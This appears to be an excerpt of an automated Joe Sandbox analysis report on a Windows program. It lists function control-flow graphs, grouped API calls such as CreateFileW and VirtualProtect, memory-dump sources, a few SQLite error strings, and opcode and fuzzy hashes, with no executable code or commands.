                                                                                                                                                                                                                                              control_flow_graph 713 7ffe013192b0-7ffe0131932f 714 7ffe01319335-7ffe0131933f 713->714 715 7ffe0131948d-7ffe013194a3 713->715 714->715 716 7ffe01319345-7ffe01319348 714->716 717 7ffe0131939f-7ffe013193e5 call 7ffe01306180 715->717 718 7ffe013194a9-7ffe013194af 715->718 716->718 719 7ffe0131934e 716->719 727 7ffe01319a7e-7ffe01319a81 717->727 728 7ffe013193eb-7ffe0131944f call 7ffe0143380c 717->728 718->717 720 7ffe013194b5-7ffe013194cb call 7ffe01306180 718->720 722 7ffe01319355-7ffe0131935e 719->722 730 7ffe01319ade 720->730 731 7ffe013194d1-7ffe013194ec 720->731 722->722 725 7ffe01319360-7ffe0131936f call 7ffe01306180 722->725 725->730 739 7ffe01319375-7ffe0131938b 00007FFE1A463010 725->739 727->730 732 7ffe01319a83-7ffe01319a8a 727->732 743 7ffe01319455-7ffe01319471 00007FFE1A463010 728->743 744 7ffe01319778-7ffe01319788 728->744 735 7ffe01319ae3-7ffe01319afa 730->735 749 7ffe013194ee-7ffe013194ff 731->749 750 7ffe01319506-7ffe0131950d 731->750 736 7ffe01319ad5 732->736 737 7ffe01319a8c-7ffe01319a96 732->737 736->730 741 7ffe01319a9e-7ffe01319acb 737->741 742 7ffe01319a98 737->742 748 7ffe01319390-7ffe01319397 739->748 741->730 767 7ffe01319acd-7ffe01319ad3 741->767 742->741 745 7ffe01319477-7ffe01319488 00007FFE1A463010 743->745 746 7ffe0131962b 743->746 747 7ffe013196cf-7ffe013196f4 744->747 752 7ffe0131962e-7ffe01319677 00007FFE1A463010 * 2 745->752 746->752 753 7ffe0131982f 747->753 754 7ffe013196fa-7ffe013196ff 747->754 748->748 755 7ffe01319399 748->755 749->750 756 7ffe01319510-7ffe01319517 750->756 758 7ffe01319679-7ffe01319680 752->758 759 7ffe013196cd 752->759 760 7ffe01319834-7ffe01319842 753->760 754->753 757 7ffe01319705-7ffe01319731 call 7ffe0130ffd0 754->757 755->717 756->756 761 7ffe01319519-7ffe01319520 756->761 768 7ffe01319734-7ffe01319754 757->768 763 7ffe01319686-7ffe01319690 758->763 764 7ffe0131976a-7ffe01319773 758->764 759->747 765 7ffe01319845-7ffe01319848 760->765 766 7ffe01319527-7ffe0131952e 761->766 769 7ffe01319692 763->769 770 7ffe01319698-7ffe013196c5 763->770 764->759 771 7ffe0131984e-7ffe01319869 call 7ffe01318830 765->771 772 7ffe013198fb-7ffe01319905 765->772 766->766 773 7ffe01319530-7ffe01319547 766->773 767->730 777 7ffe0131982a-7ffe0131982d 768->777 778 7ffe0131975a-7ffe01319764 768->778 769->770 770->759 811 7ffe013196c7 770->811 771->772 791 7ffe0131986f-7ffe013198f3 771->791 775 7ffe01319913-7ffe01319926 call 7ffe013146f0 772->775 776 7ffe01319907-7ffe01319910 772->776 780 7ffe01319597-7ffe0131959e 773->780 781 7ffe01319549 773->781 805 7ffe01319a70-7ffe01319a7c 775->805 806 7ffe0131992c-7ffe01319936 775->806 776->775 777->765 788 7ffe01319766-7ffe01319768 778->788 789 7ffe0131978d-7ffe01319790 778->789 785 7ffe013195a0-7ffe013195a7 780->785 786 7ffe013195c2-7ffe013195c9 780->786 782 7ffe01319550-7ffe01319557 781->782 792 7ffe01319560-7ffe01319569 782->792 785->717 794 7ffe013195ad-7ffe013195bc call 7ffe013c5ae0 785->794 796 7ffe013195cb-7ffe013195d5 786->796 797 7ffe0131961a 786->797 798 7ffe01319792-7ffe0131979a 788->798 789->798 819 7ffe013198f5 791->819 820 7ffe01319959-7ffe0131995f 791->820 792->792 799 7ffe0131956b-7ffe01319579 792->799 794->717 794->786 807 7ffe013195d7 796->807 808 7ffe013195dd-7ffe0131960a 796->808 813 7ffe01319623-7ffe01319626 797->813 802 7ffe013197be-7ffe013197d4 call 7ffe013c6ad0 798->802 803 7ffe0131979c-7ffe013197b0 call 7ffe01317c00 798->803 810 7ffe01319580-7ffe01319589 799->810 829 7ffe013197d6-7ffe013197eb call 7ffe0137df90 802->829 830 7ffe013197ed 802->830 803->802 828 7ffe013197b2-7ffe013197b7 803->828 805->735 816 7ffe0131993e-7ffe01319951 806->816 817 7ffe01319938 806->817 807->808 808->813 836 7ffe0131960c-7ffe01319615 808->836 810->810 821 7ffe0131958b-7ffe01319595 810->821 811->759 813->735 816->820 817->816 819->772 826 7ffe01319961-7ffe01319984 820->826 827 7ffe01319988-7ffe01319998 820->827 821->780 821->782 826->827 840 7ffe013199a0-7ffe013199d1 827->840 841 7ffe0131999a 827->841 828->802 831 7ffe013197ef-7ffe013197f4 829->831 830->831 834 7ffe01319822-7ffe01319828 831->834 835 7ffe013197f6-7ffe0131980c call 7ffe013c6ad0 831->835 834->760 835->777 846 7ffe0131980e-7ffe01319820 call 7ffe0137df90 835->846 836->735 844 7ffe013199d3-7ffe013199e2 840->844 845 7ffe013199e4-7ffe013199eb 840->845 841->840 847 7ffe013199ef-7ffe01319a11 call 7ffe01317c00 844->847 845->847 846->777 846->834 852 7ffe01319a13-7ffe01319a17 847->852 853 7ffe01319a19-7ffe01319a1c 847->853 854 7ffe01319a27-7ffe01319a39 852->854 855 7ffe01319a1e-7ffe01319a21 853->855 856 7ffe01319a23 853->856 857 7ffe01319a44-7ffe01319a56 854->857 858 7ffe01319a3b-7ffe01319a42 854->858 855->854 855->856 856->854 859 7ffe01319a5a-7ffe01319a6e 857->859 858->859 859->735
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                              • API String ID: 4225454184-4201244970
                                                                                                                                                                                                                                              • Opcode ID: 2eb986691ab63cf5690bea890f4959007ca672382fe7041f02c4300093660c28
                                                                                                                                                                                                                                              • Instruction ID: 61ad543d6d888814e0326e1701cd2e661fc641cbfdca3b8ccac42d054310133b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2eb986691ab63cf5690bea890f4959007ca672382fe7041f02c4300093660c28
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01327C22A09782CAEB658F25985037937A1FF45BA8F094235CA6E0BBF5DF3CE455C311
                                                                                                                                                                                                                                              Function 00007FF6B7526964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 981 7ff6b7526964-7ff6b75269d7 call 7ff6b7526698 984 7ff6b75269d9-7ff6b75269e2 call 7ff6b7514ee8 981->984 985 7ff6b75269f1-7ff6b75269fb call 7ff6b7518520 981->985 990 7ff6b75269e5-7ff6b75269ec call 7ff6b7514f08 984->990 991 7ff6b7526a16-7ff6b7526a7f CreateFileW 985->991 992 7ff6b75269fd-7ff6b7526a14 call 7ff6b7514ee8 call 7ff6b7514f08 985->992 1005 7ff6b7526d32-7ff6b7526d52 990->1005 995 7ff6b7526afc-7ff6b7526b07 GetFileType 991->995 996 7ff6b7526a81-7ff6b7526a87 991->996 992->990 997 7ff6b7526b09-7ff6b7526b44 GetLastError call 7ff6b7514e7c CloseHandle 995->997 998 7ff6b7526b5a-7ff6b7526b61 995->998 1001 7ff6b7526ac9-7ff6b7526af7 GetLastError call 7ff6b7514e7c 996->1001 1002 7ff6b7526a89-7ff6b7526a8d 996->1002 997->990 1016 7ff6b7526b4a-7ff6b7526b55 call 7ff6b7514f08 997->1016 1008 7ff6b7526b69-7ff6b7526b6c 998->1008 1009 7ff6b7526b63-7ff6b7526b67 998->1009 1001->990 1002->1001 1003 7ff6b7526a8f-7ff6b7526ac7 CreateFileW 1002->1003 1003->995 1003->1001 1012 7ff6b7526b72-7ff6b7526bc7 call 7ff6b7518438 1008->1012 1014 7ff6b7526b6e 1008->1014 1009->1012 1019 7ff6b7526be6-7ff6b7526c17 call 7ff6b7526418 1012->1019 1020 7ff6b7526bc9-7ff6b7526bd5 call 7ff6b75268a0 1012->1020 1014->1012 1016->990 1027 7ff6b7526c19-7ff6b7526c1b 1019->1027 1028 7ff6b7526c1d-7ff6b7526c5f 1019->1028 1020->1019 1026 7ff6b7526bd7 1020->1026 1029 7ff6b7526bd9-7ff6b7526be1 call 7ff6b751aac0 1026->1029 1027->1029 1030 7ff6b7526c81-7ff6b7526c8c 1028->1030 1031 7ff6b7526c61-7ff6b7526c65 1028->1031 1029->1005 1032 7ff6b7526d30 1030->1032 1033 7ff6b7526c92-7ff6b7526c96 1030->1033 1031->1030 1035 7ff6b7526c67-7ff6b7526c7c 1031->1035 1032->1005 1033->1032 1036 7ff6b7526c9c-7ff6b7526ce1 CloseHandle CreateFileW 1033->1036 1035->1030 1038 7ff6b7526d16-7ff6b7526d2b 1036->1038 1039 7ff6b7526ce3-7ff6b7526d11 GetLastError call 7ff6b7514e7c call 7ff6b7518660 1036->1039 1038->1032 1039->1038
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction ID: cf893e351dc205a47d7644c89b0848d5f0e7030fc3451c5f0b844973060f5006
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68C1AE37B28A4685EB10CFA9C4906AC3761FB49BA8F115239DF5E97BA4DF38E451C340
                                                                                                                                                                                                                                              Function 00007FFDFB429060 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2118545805.00007FFDFB429000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF20000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117371386.00007FFDFAF20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFAF21000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFAF32000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFAF42000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFAF48000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFAF92000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFAFA7000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFAFB7000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFAFBE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFAFCC000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFB1AE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFB299000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFB29B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFB2D2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFB30F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFB36A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFB3DB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFB410000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117447704.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118578234.00007FFDFB42A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaf20000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                              • String ID: )tP
                                                                                                                                                                                                                                              • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                                              • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                              • Instruction ID: f2b42df840af097b34a73ba61013dc2c7b44413ea0e5c0f9ecb81c09dff000a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5162282272919286E7198F38D6106BD77E0FB48789F045531EEAEC37D8EA7CEA45D700
                                                                                                                                                                                                                                              Function 00007FFE01384C70 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1895 7ffe01384c70-7ffe01384d41 call 7ffe0143380c 1898 7ffe01384d43-7ffe01384d56 1895->1898 1899 7ffe01384d59-7ffe01384d5d 1895->1899 1898->1899 1900 7ffe01384d5f-7ffe01384d78 call 7ffe0130a500 1899->1900 1901 7ffe01384d7d-7ffe01384d83 1899->1901 1908 7ffe013851ec-7ffe0138521a call 7ffe013849c0 call 7ffe01432900 1900->1908 1903 7ffe01384d85-7ffe01384d8f 1901->1903 1904 7ffe01384d96-7ffe01384d9e 1901->1904 1903->1904 1906 7ffe01384da4-7ffe01384daa 1904->1906 1907 7ffe01384e81-7ffe01384e89 1904->1907 1911 7ffe01384db0-7ffe01384db7 1906->1911 1912 7ffe01384e7c 1906->1912 1909 7ffe01384e93-7ffe01384e96 1907->1909 1910 7ffe01384e8b-7ffe01384e8e call 7ffe0139e660 1907->1910 1915 7ffe01384e9c 1909->1915 1916 7ffe01384f3b-7ffe01384f43 call 7ffe013bfc80 1909->1916 1910->1909 1917 7ffe01384dc0-7ffe01384dcc 1911->1917 1912->1907 1920 7ffe01384e9e-7ffe01384ea4 1915->1920 1921 7ffe01384eaa-7ffe01384eb1 1915->1921 1928 7ffe01384f48-7ffe01384f4b 1916->1928 1922 7ffe01384e3e-7ffe01384e49 1917->1922 1923 7ffe01384dce-7ffe01384dd2 1917->1923 1920->1916 1920->1921 1924 7ffe01384eb3-7ffe01384ed6 call 7ffe0130a370 call 7ffe01306d20 1921->1924 1925 7ffe01384edb-7ffe01384ede 1921->1925 1929 7ffe01384e4b-7ffe01384e4d 1922->1929 1930 7ffe01384e77 1922->1930 1926 7ffe01384dd4-7ffe01384ddb 1923->1926 1927 7ffe01384de7-7ffe01384def 1923->1927 1924->1908 1938 7ffe01384ee0-7ffe01384ef2 call 7ffe01306880 1925->1938 1939 7ffe01384f2e-7ffe01384f39 1925->1939 1926->1927 1934 7ffe01384ddd-7ffe01384de5 call 7ffe0131fef0 1926->1934 1927->1922 1937 7ffe01384df1-7ffe01384df8 1927->1937 1935 7ffe01384f4d-7ffe01384f54 1928->1935 1936 7ffe01384f57-7ffe01384f63 1928->1936 1929->1917 1930->1912 1934->1927 1935->1936 1942 7ffe01384f65-7ffe01384f71 1936->1942 1943 7ffe01384fc8-7ffe01384fcc 1936->1943 1944 7ffe01384dfa-7ffe01384dfe 1937->1944 1945 7ffe01384e07-7ffe01384e0e 1937->1945 1938->1939 1963 7ffe01384ef4-7ffe01384f2c 00007FFE1A463010 call 7ffe013bfc80 call 7ffe01306400 1938->1963 1939->1928 1942->1943 1949 7ffe01384f73-7ffe01384f7d 1942->1949 1954 7ffe01384fe1-7ffe01384fe7 1943->1954 1955 7ffe01384fce-7ffe01384fdc 1943->1955 1944->1945 1950 7ffe01384e00-7ffe01384e05 1944->1950 1952 7ffe01384e10-7ffe01384e13 1945->1952 1953 7ffe01384e2a 1945->1953 1960 7ffe01384f7f 1949->1960 1961 7ffe01384f89-7ffe01384f8f 1949->1961 1962 7ffe01384e2c-7ffe01384e30 1950->1962 1964 7ffe01384e15-7ffe01384e19 1952->1964 1965 7ffe01384e21-7ffe01384e28 1952->1965 1953->1962 1957 7ffe01385184-7ffe013851a2 1954->1957 1958 7ffe01384fed-7ffe01384ff0 1954->1958 1956 7ffe01385118-7ffe0138511b 1955->1956 1966 7ffe01385125-7ffe01385131 1956->1966 1967 7ffe0138511d-7ffe01385120 call 7ffe013359e0 1956->1967 1968 7ffe013851a4-7ffe013851ad 1957->1968 1969 7ffe013851bf-7ffe013851c6 1957->1969 1958->1957 1970 7ffe01384ff6-7ffe01384ffb 1958->1970 1960->1961 1971 7ffe01384f91-7ffe01384fa3 call 7ffe01306880 1961->1971 1972 7ffe01384fba 1961->1972 1975 7ffe01384e32-7ffe01384e35 call 7ffe0131fec0 1962->1975 1976 7ffe01384e3a-7ffe01384e3c 1962->1976 1963->1928 1964->1965 1974 7ffe01384e1b-7ffe01384e1f 1964->1974 1965->1952 1965->1953 1983 7ffe01385133-7ffe0138514c call 7ffe0130a370 1966->1983 1984 7ffe01385158-7ffe01385161 1966->1984 1967->1966 1980 7ffe013851af-7ffe013851b7 call 7ffe01330600 1968->1980 1981 7ffe013851b9 1968->1981 1969->1908 1985 7ffe013851c8 1969->1985 1970->1956 1982 7ffe01385001-7ffe01385008 1970->1982 1988 7ffe01384fbc-7ffe01384fc3 1971->1988 2003 7ffe01384fa5-7ffe01384fb8 00007FFE1A463010 1971->2003 1972->1988 1974->1950 1974->1965 1975->1976 1976->1922 1978 7ffe01384e52-7ffe01384e72 call 7ffe0130a370 1976->1978 1978->1908 1980->1969 1981->1969 1982->1956 1990 7ffe0138500e-7ffe0138501a 1982->1990 1983->1969 2009 7ffe0138514e-7ffe01385156 call 7ffe01306400 1983->2009 1995 7ffe01385163-7ffe0138516b 1984->1995 1996 7ffe01385176-7ffe01385182 call 7ffe0130a250 1984->1996 1993 7ffe013851d0-7ffe013851ea call 7ffe01306400 1985->1993 1988->1943 1990->1956 1999 7ffe01385020-7ffe0138502d 1990->1999 1993->1908 1995->1996 2004 7ffe0138516d-7ffe01385174 1995->2004 1996->1969 2008 7ffe01385030-7ffe01385044 1999->2008 2003->1988 2004->1969 2011 7ffe013850fd-7ffe01385108 2008->2011 2012 7ffe0138504a-7ffe0138504e 2008->2012 2009->1969 2011->2008 2014 7ffe0138510e-7ffe01385113 2011->2014 2015 7ffe01385050-7ffe01385062 call 7ffe01323790 2012->2015 2016 7ffe01385088-7ffe01385090 2012->2016 2014->1956 2029 7ffe01385064-7ffe01385069 2015->2029 2030 7ffe0138506b-7ffe01385073 call 7ffe01306c40 2015->2030 2018 7ffe013850a3-7ffe013850b6 2016->2018 2019 7ffe01385092-7ffe01385099 2016->2019 2022 7ffe013850b8-7ffe013850bc 2018->2022 2023 7ffe013850c6-7ffe013850d2 2018->2023 2019->2018 2021 7ffe0138509b-7ffe0138509e call 7ffe0131fef0 2019->2021 2021->2018 2022->2023 2026 7ffe013850be-7ffe013850c1 call 7ffe0131fec0 2022->2026 2027 7ffe013850d4-7ffe013850e9 call 7ffe01361280 2023->2027 2028 7ffe013850ee-7ffe013850f3 2023->2028 2026->2023 2027->2028 2028->2011 2034 7ffe013850f5-7ffe013850f8 call 7ffe01324b80 2028->2034 2029->2030 2033 7ffe01385077-7ffe0138507a 2029->2033 2030->2033 2033->2014 2036 7ffe01385080 2033->2036 2034->2011 2036->2016
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                              • API String ID: 4225454184-1046679716
                                                                                                                                                                                                                                              • Opcode ID: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
                                                                                                                                                                                                                                              • Instruction ID: 7889928ddd94b615c0a754c5a890a7c933b39e27cf60508aafb662c496701ec5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57F18E22A0C78286EB65CF2594143BE6BA0FB85B88F1A4135DA8D0FBA5DF7CE545C740
                                                                                                                                                                                                                                              Function 00007FFDFBAB33C0 Relevance: 6.9, APIs: 4, Instructions: 900librarymemoryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119652825.00007FFDFBAB3000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FFDFB460000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118621487.00007FFDFB460000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB461000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB745000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB74F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB791000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB860000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB868000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB96B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB96F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB9B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB9BE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFB9FF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFBA33000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFBA5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFBA72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118655051.00007FFDFBAAC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119683016.00007FFDFBAB5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfb460000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                                              • Opcode ID: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
                                                                                                                                                                                                                                              • Instruction ID: e5da794066cb80445f9f4987f002fb62e026548d81cfde92beded70aff1fc48c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5062266272999286E7158F38D41067D77E0F748785F049532EABEC37D8EABCEA45CB00
                                                                                                                                                                                                                                              Function 00007FFDFAF10350 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117242370.00007FFDFAF10000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116507686.00007FFDFAE60000.00000002.00000001.01000000.00000013.sdmpDownload File
